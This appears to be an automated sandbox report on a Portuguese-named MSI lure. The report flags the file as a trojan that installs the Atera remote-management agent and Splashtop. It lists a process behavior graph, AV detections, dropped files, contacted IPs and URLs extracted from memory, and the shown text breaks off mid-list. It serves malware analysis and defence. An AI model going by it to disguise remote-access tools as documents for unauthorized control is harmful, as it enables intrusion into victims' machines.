                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1524137 Sample: TRABALHO----PROCESSO0014S55... Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 148 Multi AV Scanner detection for dropped file 2->148 150 Multi AV Scanner detection for submitted file 2->150 152 Yara detected AteraAgent 2->152 154 10 other signatures 2->154 8 AteraAgent.exe 2->8         started        12 msiexec.exe 501 438 2->12         started        14 AteraAgent.exe 2->14         started        17 5 other processes 2->17 process3 dnsIp4 94 C:\...\System.Management.dll, PE32 8->94 dropped 96 C:\...96ewtonsoft.Json.dll, PE32 8->96 dropped 98 C:\...\Microsoft.Win32.TaskScheduler.dll, PE32 8->98 dropped 106 273 other malicious files 8->106 dropped 164 Installs Task Scheduler Managed Wrapper 8->164 19 AgentPackageProgramManagement.exe 8->19         started        23 AgentPackageUpgradeAgent.exe 8->23         started        34 6 other processes 8->34 100 C:\Windows\Installer\MSID8C1.tmp, PE32 12->100 dropped 102 C:\Windows\Installer\MSICBCF.tmp, PE32 12->102 dropped 104 C:\Windows\Installer\MSIBD86.tmp, PE32 12->104 dropped 108 309 other files (257 malicious) 12->108 dropped 26 msiexec.exe 12->26         started        28 AteraAgent.exe 12->28         started        36 2 other processes 12->36 142 13.35.58.104 AMAZON-02US United States 14->142 144 35.157.63.229 AMAZON-02US United States 14->144 110 31 other malicious files 14->110 dropped 166 Creates files in the system32 config directory 14->166 168 Reads the Security eventlog 14->168 170 Reads the System eventlog 14->170 30 AgentPackageAgentInformation.exe 14->30         started        38 6 other processes 14->38 146 20.101.57.9 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->146 32 conhost.exe 17->32         started        file5 signatures6 process7 dnsIp8 86 15 other malicious files 19->86 dropped 156 Creates files in the system32 config directory 19->156 40 conhost.exe 19->40         started        130 20.60.197.1 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->130 76 C:\...\System.ValueTuple.dll, PE32 23->76 dropped 78 C:\Program Files (x86)\...\Pubnub.dll, PE32 23->78 dropped 80 C:\...80ewtonsoft.Json.dll, PE32 23->80 dropped 88 4 other malicious files 23->88 dropped 50 2 other processes 23->50 42 rundll32.exe 8 26->42         started        52 3 other processes 26->52 132 192.229.221.95 EDGECASTUS United States 28->132 134 93.184.221.240 EDGECASTUS European Union 28->134 90 2 other malicious files 28->90 dropped 158 Reads the Security eventlog 28->158 160 Reads the System eventlog 28->160 46 cmd.exe 30->46         started        48 conhost.exe 30->48         started        136 13.107.253.72 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 34->136 82 C:\...\TicketingTray.exe (copy), PE32 34->82 dropped 92 2 other malicious files 34->92 dropped 162 Queries disk data (e.g. SMART data) 34->162 55 6 other processes 34->55 57 2 other processes 36->57 138 35.71.184.3 MERIT-AS-14US United States 38->138 140 13.35.58.89 AMAZON-02US United States 38->140 84 C:\Windows\Temp\SplashtopStreamer.exe, PE32 38->84 dropped 59 6 other processes 38->59 file9 signatures10 process11 dnsIp12 112 C:\Windows\Installer\...112ewtonsoft.Json.dll, PE32 42->112 dropped 114 C:\...\AlphaControlAgentInstallation.dll, PE32 42->114 dropped 116 C:\Windows\...\System.Management.dll, PE32 42->116 dropped 118 Microsoft.Deployme...indowsInstaller.dll, PE32 42->118 dropped 172 Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes) 42->172 174 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 42->174 176 Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes) 42->176 61 cscript.exe 46->61         started        64 conhost.exe 46->64         started        128 40.119.152.241 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 52->128 120 C:\Windows\Installer\...120ewtonsoft.Json.dll, PE32 52->120 dropped 122 C:\...\AlphaControlAgentInstallation.dll, PE32 52->122 dropped 124 C:\Windows\Installer\...124ewtonsoft.Json.dll, PE32 52->124 dropped 126 9 other files (3 malicious) 52->126 dropped 178 System process connects to network (likely due to code injection or exploit) 52->178 66 conhost.exe 55->66         started        68 cscript.exe 55->68         started        70 conhost.exe 57->70         started        72 net1.exe 57->72         started        74 conhost.exe 57->74         started        file13 signatures14 process15 signatures16 180 Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes) 61->180 182 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 61->182 184 Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes) 61->184

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                TRABALHO----PROCESSO0014S55-S440000000S1.msi24%ReversingLabsWin32.Trojan.Atera

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                4c9995.rbf (copy)26%ReversingLabsWin32.Trojan.Atera
                                4c9997.rbf (copy)0%ReversingLabs
                                4c9998.rbf (copy)0%ReversingLabs
                                4c9999.rbf (copy)0%ReversingLabs
                                4c999a.rbf (copy)0%ReversingLabs
                                4c999b.rbf (copy)0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe26%ReversingLabsWin32.Trojan.Atera
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Encodings.Web.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\browser\lib\net6.0\System.Text.Encodings.Web.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.ServiceProcess.ServiceController.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                No Antivirus matches

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.gnu.org/AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                  https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/29.5/AgentPackageTicketing.zip?BjzRoFMAteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                    https://ps.atera.com/agentpackagesmac/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      http://pwnt.coAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                        https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          https://agent-api.PbAteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmpfalse
                                            https://ch0.co/packages_configAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                              http://schemas.datacontract.orgAteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpfalse
                                                https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  https://community.chocolatey.org/packages/checksum.AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                    https://agent-api.PZAteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgXAgentPackageTicketing.exe, 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        https://ps.atera.com/agentpackageswin/AgentPackageInternalPoller/15.9/AgentPackageInternalPoller.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=5df3382d-fbc6-4dc1-a4cf-d657545b8fb0AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            http://logging.apache.org/log4net/release/faq.html#trouble-EventLogAgentPackageProgramManagement.exe, 00000035.00000002.2265471511.00000213B38B2000.00000002.00000001.01000000.0000003F.sdmpfalse
                                                              https://chocolatey.org/contact.AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                https://nlog-project.org/AgentPackageMonitoring.exe, 00000025.00000002.1830156930.0000022AD93F8000.00000002.00000001.01000000.00000025.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                  https://ps.atera.com/agentpackagesmac/AgentPackageProgramManagement/24.9/AgentPackageProgramManagemeAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    https://agent-api.atera.com/Production/Agent/track-eventrundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      https://aka.ms/dotnet/app-launch-failedAteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        http://dl.google.com/googletalk/googletalk-setup.exeAteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.16.drfalse
                                                                          https://community.chocolatey.org/packages/checksum)AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                            http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershellAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                              HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/36.9/AGENTPACKAGEMONITORING.ZIPAteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                http://stackoverflow.com/questions/518181/too-many-automatic-redirections-were-attempted-error-messaAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                  http://somewhere123zzaafasd.invalidUAttemptingAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                    https://ps.atera.com/agentpackagesmac/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://agent-api.atera.com/Production/v1/Provision/syncAgentPackageMarketplace.exe, 0000003A.00000002.2116373812.0000016598488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://chocolatey.org/compare0fAgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          http://somehwere/something.exeAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                            https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_config.gifAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                              https://agent-api.atera.com/Production/v1/Provision/scripts?operatingSystem=WindowsAgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165983D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://schemas.datacontract.org/2004/07/System.ServiceProcessAteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://community.chocolatey.org/api/v2/hAgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B470000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B5D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.40/AgentPackageMonitoring.zAteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://docs.chocolatey.org/en-us/choco/commands/uninstallAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                        https://my.splashtop.com/csrs/winAgentPackageSTRemote.exe, 00000020.00000000.1634120098.0000027054F02000.00000002.00000001.01000000.0000001C.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://docs.chocolatey.org/en-us/create/automatic-packages#automatic-updater-auAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                            https://github.com/downloads/spraints/git-tfs/GitTfs-0.11.0.zipAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                              http://wixtoolset.orgrundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drfalse
                                                                                                                https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.5/Agent.Package.Watchdog.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEHEARTBEAT/17.14/AGENTPACKAGEHEARTBEAT.ZIPAteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    https://chocolatey.org/compare.AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                      https://agent-api.atera.com/Production/Agent/track-event;rundll32.exe, 00000006.00000002.1359772261.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstallerAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          http://acontrol.atera.com/AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            https://agent-api.atera.com/Production/Agent/dynamic-fields/AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              https://agent-api.atera.com/Production/Agent/AgentStarting)AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://docs.nuget.org/create/Nuspec-Reference.AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                  https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/37.9/AgentPackageAgentInformationAteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://docs.chocolatey.org/en-us/guides/create/create-custom-package-templatesAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmp, 